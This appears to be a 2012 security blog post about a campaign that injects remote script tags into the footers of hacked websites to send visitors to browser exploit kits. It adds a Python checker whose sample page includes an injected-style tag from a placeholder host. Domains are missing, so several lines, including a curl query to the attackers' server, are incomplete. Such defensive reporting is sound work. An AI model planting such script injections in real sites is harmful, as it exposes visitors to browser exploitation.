Malware Campaign from

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the TLD.

This is what gets added to the footer of the hacked sites:

<script  src= ""></script>

Once loaded, it does another level of redirection to (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit the visitor's browser using multiple exploit kits.
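One way a site owner could check pages for this kind of footer injection, as an added example that is not from the original post: it lists every `<script src>` whose host is outside an allow-list and marks those near the end of the file. The function names, the allow-list and every hostname in the sample are assumptions made up for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptAudit(HTMLParser):
    """Record every <script src=...> tag with its line number."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of (line, src)

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src and src.strip():
            self.scripts.append((self.getpos()[0], src.strip()))


def host_allowed(host, allowed):
    # Exact match, or a true subdomain of an allow-listed host.
    return any(host == a or host.endswith("." + a) for a in allowed)


def find_foreign_scripts(html, allowed, tail_lines=15):
    """Return one dict per script loaded from a host outside `allowed`.

    `in_footer` is True when the tag sits in the last `tail_lines` lines,
    which is where the post says the injected tag is placed.
    """
    audit = ScriptAudit()
    audit.feed(html)
    audit.close()
    total = html.count("\n") + 1
    hits = []
    for line, src in audit.scripts:
        host = (urlparse(src).hostname or "").lower()  # None for relative URLs
        if host and not host_allowed(host, allowed):
            hits.append({"line": line, "host": host, "src": src,
                         "in_footer": line > total - tail_lines})
    return hits


# Constructed sample page; every hostname is a placeholder, not an indicator.
SAMPLE = """<html><head>
<script src="/js/site.js"></script>
<script src="//cdn.site.example/lib.js"></script>
</head><body>
<p>content</p>
<div id="footer">&copy; site</div>
<script  src= "http://a1b2c3.injected.example/x.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_foreign_scripts(SAMPLE, {"site.example"}, tail_lines=3):
        print(hit)
```

Because the campaign's domains change daily, the check keys on what is allowed rather than on a blocklist of known-bad hosts.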

Those domains are changing daily, but always pointing to What’s interesting is that the compromised sites also have a backdoor that calls (their command and control) to get the new list of domains to display.

A quick query of this site shows the current live domains:

$ curl -sq

Here are domains we have found so far:

We will post more details as we continue to monitor this campaign.

Let us know in the comments below if you have any questions.


Story added 11. March 2012, content source with full text you can find at link above.